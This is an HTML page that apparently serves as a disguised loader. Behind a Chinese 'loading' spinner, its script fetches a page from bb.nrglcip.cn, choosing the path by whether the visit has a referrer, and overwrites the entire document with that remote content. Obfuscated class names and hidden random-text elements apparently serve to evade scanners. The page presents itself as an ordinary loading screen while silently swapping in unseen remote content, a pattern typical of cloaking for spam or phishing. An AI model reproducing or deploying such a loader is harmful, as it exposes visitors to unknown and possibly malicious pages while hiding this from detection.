<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .H1Aswme1O {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .H1Aswme1O .lsuPDCDYA {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .H1Aswme1O .content {
            line-height: 50px;
            text-align: center
        }

        .H1Aswme1O .img {
            width: 100%
        }

        .H1Aswme1O .kO9R6t6kzV7 {
            text-align: center
        }

        .H1Aswme1O .kO9R6t6kzV7 span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .H1Aswme1O .kO9R6t6kzV7 span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .H1Aswme1O .kO9R6t6kzV7 span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .H1Aswme1O .kO9R6t6kzV7 span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .H1Aswme1O .kO9R6t6kzV7 span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .H1Aswme1O .kO9R6t6kzV7 span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .H1Aswme1O .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function e9mQa4Ayg(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var C5I6g = e9mQa4Ayg('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ C5I6g +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ C5I6g +".html?a=share";
		}
		
        pBkKAqg5=url+"#"+new Date().getTime();
        pBkKAqg5 && function() {
            $.get(pBkKAqg5, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<p  style='display:none'>DcwROBm9zYJrFUP0ZEKbCek0VmrkvmcQIAAsf2Di</p>
<ul style='display:none' >JU8l4x1Z7PtEhAYjoBZ4fi5p1prYwMmXZA0X6gykjqY0w6uzY</ul>
<p  style='display:none'>DcwROBm9zYJrFUP0ZEKbCek0VmrkvmcQIAAsf2Di</p><div class="H1Aswme1O">
    <div class="lsuPDCDYA">
        <div class="kO9R6t6kzV7">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<h1 style='display:none' >dLU3ce0ygzPLeCDqu0F5IFHDiPIUt0CUNruGqRvf12zxOcvkEfrjAvgY2HXendYScn5pE737177oJx6rHZ0iP0ltuPzEiXFHitt</h1>
<ul style='display:none' >eKINgrypvl8Gcvz1KqCPJdMv</ul>
<li style='display:none' >rb1gsEL2b2xgTaPCxwBG639rQ29dhg68DB4GoxOZVKwsY7vU0yi</li>
<div style='display:none'>hcni64I6vLcwbNBMoTBfcdOxsTDqd8hNQrcvWjhZTOZPJ8agvPg9ZMpWmi5JrcooF6VKcUd4fR88j5HgN</div></body>
</html>